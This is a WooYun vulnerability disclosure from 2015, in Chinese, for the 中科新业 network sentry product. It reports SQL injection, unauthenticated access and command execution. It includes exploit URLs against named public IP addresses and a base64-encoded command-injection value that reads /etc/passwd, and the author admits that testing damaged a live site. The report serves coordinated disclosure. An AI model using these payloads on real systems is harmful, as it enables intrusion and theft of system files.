漏洞概要
缺陷编号:
WooYun-2015-123366
漏洞标题: 中科新业网络哨兵 多处sql注射/命令执行/文件下载
相关厂商:
中科新业
漏洞作者:
menmen519
提交时间: 2015-07-02 11:29
公开时间: 2015-10-01 13:38
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 11
漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org
Tags标签:
php源码分析
漏洞详情披露状态:
2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-03: 厂商已经确认,细节仅向厂商公开
2015-07-06: 细节向第三方安全合作伙伴开放
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开
简要描述:
中科新业网络哨兵 两处sql注射/全局导出越权
详细说明:
changauthprioritystatus.php:
code 区域session_start( );
...
shutting down at 23:26:17
下来同样的原理
changauthprioritystatus_ucwiz.php:
code 区域session_start( );
require_once( "../../../include/globalvar.h" );
...
这里虽然位于admin下面但是,也是无权限验证
下来我们看,越权行为,无需登录即可触发
https://219.134.131.244/ucenter/include/changauthprioritystatus.php?par=xx
命令执行:
admin/export.php:
code 区域<?php
/*********************/
/* */
/* Dezend for PHP5 */
/* NWS */
/* Nulled.WS */
/* */
/*********************/
include( "../include/globalvar.h" );
文件下载:
命令为" & cat /etc/p & "
url:
https://220.165.220.62/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D
返回来的文件内容就是命令执行后读取的文件
https://218.108.62.254/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D
admin/addmacwhitelist.php
code 区域session_start( );
header( "Expires: Mon, 26 Jul 2000 05:00:00 GMT" );
header( "Last-Modified: ".gmdate( "D, d M Y H:i:s" )."GMT" );
...
发送url:
命令执行:
admin/exchange.php:
code 区域session_start( );
header( "Content-Type: text/html; charset=GB2312" );
include( "../include/globalvar.h" );
include( "../include/connectdb.php" );
require_once( "../include/WriteLog.php" );
...
命令执行 这里就不多解释了
eg:
再次给道个歉,测试站点被测试坏了,哎,差点吓尿了,期初以为删了站点,现在看来是某个命令执行,导致删除了某个配置文件导致,最后补充,这个功能好像不是所有的产品都具有的,只有一部分
漏洞证明:
修复方案:
版权声明:转载请注明来源
menmen519@
乌云
漏洞回应
厂商回应:危害等级:高
漏洞Rank:11
确认时间:2015-07-03 13:37
厂商回复:CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。
最新状态:暂无